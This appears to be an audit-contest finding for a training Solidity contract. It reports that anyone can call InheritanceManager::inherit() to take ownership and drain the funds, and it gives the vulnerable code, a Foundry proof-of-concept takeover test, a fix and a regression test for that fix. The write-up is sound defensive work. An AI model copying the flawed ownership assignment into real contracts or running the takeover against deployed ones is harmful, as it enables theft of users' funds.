Tags: Beginner Friendly, Solidity, 100 EXP
Submission Details
Severity: high
Valid

Anyone can become owner by calling inherit() and can then steal the funds

Description: The function InheritanceManager::inherit can be called by anyone. When exactly one beneficiary is registered and the inactivity deadline has passed, the function assigns ownership to msg.sender without checking that the caller is that beneficiary, so whoever calls first becomes the owner.

function inherit() external {
    if (block.timestamp < getDeadline()) {
        revert InactivityPeriodNotLongEnough();
    }
    if (beneficiaries.length == 1) {
        // No check that msg.sender is the beneficiary: the first caller becomes owner
        owner = msg.sender;
        _setDeadline();
    } else if (beneficiaries.length > 1) {
        isInherited = true;
    } else {
        revert InvalidBeneficiaries();
    }
}

Impact: Once the inactivity deadline has passed and there is exactly one beneficiary, any address can call inherit, take ownership of the contract, and then use the owner-only functions to withdraw the funds that were meant for the beneficiary. The legitimate beneficiary is locked out.

Proof of Concept:

Add this test to InheritanceManagerTest.t.sol; it relies on the fixtures the file's existing setUp() already provides (im, owner and user1):

function testHackerCanBeOwner() public {
    address hacker = makeAddr("hacker");
    // Register exactly one beneficiary so inherit() takes the single-beneficiary branch
    // (addBeneficiery is spelled as in the project)
    vm.prank(owner);
    im.addBeneficiery(user1);
    // Move past the 90-day inactivity deadline (Foundry deploys at timestamp 1)
    vm.warp(1 + 90 days);
    // An unrelated address calls inherit()
    vm.prank(hacker);
    im.inherit();
    // ...and is now the owner
    console.log("The owner of the contract:", hacker);
    assertEq(im.getOwner(), hacker);
}

Recommended Mitigation: Change the following line in InheritanceManager::inherit so that ownership passes to the registered beneficiary rather than to the caller:

function inherit() external {
if (block.timestamp < getDeadline()) {
revert InactivityPeriodNotLongEnough();
}
if (beneficiaries.length == 1) {
- owner = msg.sender;
+ owner = beneficiaries[0];
_setDeadline();
} else if (beneficiaries.length > 1) {
isInherited = true;
} else {
revert InvalidBeneficiaries();
}
}
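Review bot: the `+ owner = beneficiaries[0];` line removes the msg.sender dependency, which is the right fix, and inherit() may stay callable by anyone since the caller no longer gains anything from calling it. One thing to confirm before merging: if the project's beneficiary-removal code (not shown here) can leave a zero entry in the array, the single-beneficiary branch should reject beneficiaries[0] == address(0) instead of handing ownership to the zero address and resetting the deadline. Add a regression test asserting that a non-beneficiary calling after the deadline makes beneficiaries[0], not msg.sender, the owner.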

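The following is an added regression test for the mitigation, written for this page and not part of the submission or of the InheritanceManager project. It uses a minimal stand-in contract (hypothetical name MinimalInheritanceManager, with an assumed 90-day TIMELOCK, a correctly spelled addBeneficiary and a NotOwner error) that reproduces only the state inherit() touches, with the hardened branch applied, and checks that an attacker's call after the deadline makes the registered beneficiary the owner and that a call before the deadline reverts.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Minimal stand-in for InheritanceManager (hypothetical, not the project's code):
// only the state that inherit() reads and writes. The 90-day inactivity period
// mirrors the warp used in the PoC above.
contract MinimalInheritanceManager {
    error InactivityPeriodNotLongEnough();
    error InvalidBeneficiaries();
    error NotOwner();

    uint256 public constant TIMELOCK = 90 days; // assumed value
    address public owner;
    address[] public beneficiaries;
    bool public isInherited;
    uint256 private deadline;

    constructor() {
        owner = msg.sender;
        _setDeadline();
    }

    modifier onlyOwner() {
        if (msg.sender != owner) revert NotOwner();
        _;
    }

    function addBeneficiary(address b) external onlyOwner {
        beneficiaries.push(b);
        _setDeadline();
    }

    function getDeadline() public view returns (uint256) {
        return deadline;
    }

    function _setDeadline() internal {
        deadline = block.timestamp + TIMELOCK;
    }

    // Hardened inherit(): ownership goes to the registered beneficiary, never to msg.sender.
    function inherit() external {
        if (block.timestamp < getDeadline()) revert InactivityPeriodNotLongEnough();
        if (beneficiaries.length == 1) {
            owner = beneficiaries[0];
            _setDeadline();
        } else if (beneficiaries.length > 1) {
            isInherited = true;
        } else {
            revert InvalidBeneficiaries();
        }
    }
}

contract InheritFixTest is Test {
    MinimalInheritanceManager im;
    address ownerAddr = makeAddr("owner");
    address user1 = makeAddr("user1");
    address hacker = makeAddr("hacker");

    function setUp() public {
        // vm.prank also applies to contract creation, so ownerAddr becomes owner
        vm.prank(ownerAddr);
        im = new MinimalInheritanceManager();
        vm.prank(ownerAddr);
        im.addBeneficiary(user1);
    }

    function testHackerCannotBecomeOwnerAfterFix() public {
        vm.warp(block.timestamp + 90 days);
        vm.prank(hacker);
        im.inherit();
        // The attacker's call succeeds, but the beneficiary is the one who inherits
        assertEq(im.owner(), user1);
        assertTrue(im.owner() != hacker);
    }

    function testInheritRevertsBeforeDeadline() public {
        vm.prank(hacker);
        vm.expectRevert(MinimalInheritanceManager.InactivityPeriodNotLongEnough.selector);
        im.inherit();
    }
}
```

Run it with forge test --match-contract InheritFixTest. Dropping the hardened line back to owner = msg.sender makes the first test fail, which is the regression the fix is meant to guard against.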
Updates

Lead Judging Commences

0xtimefliez Lead Judge 6 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Inherit depends on msg.sender so anyone can claim the contract
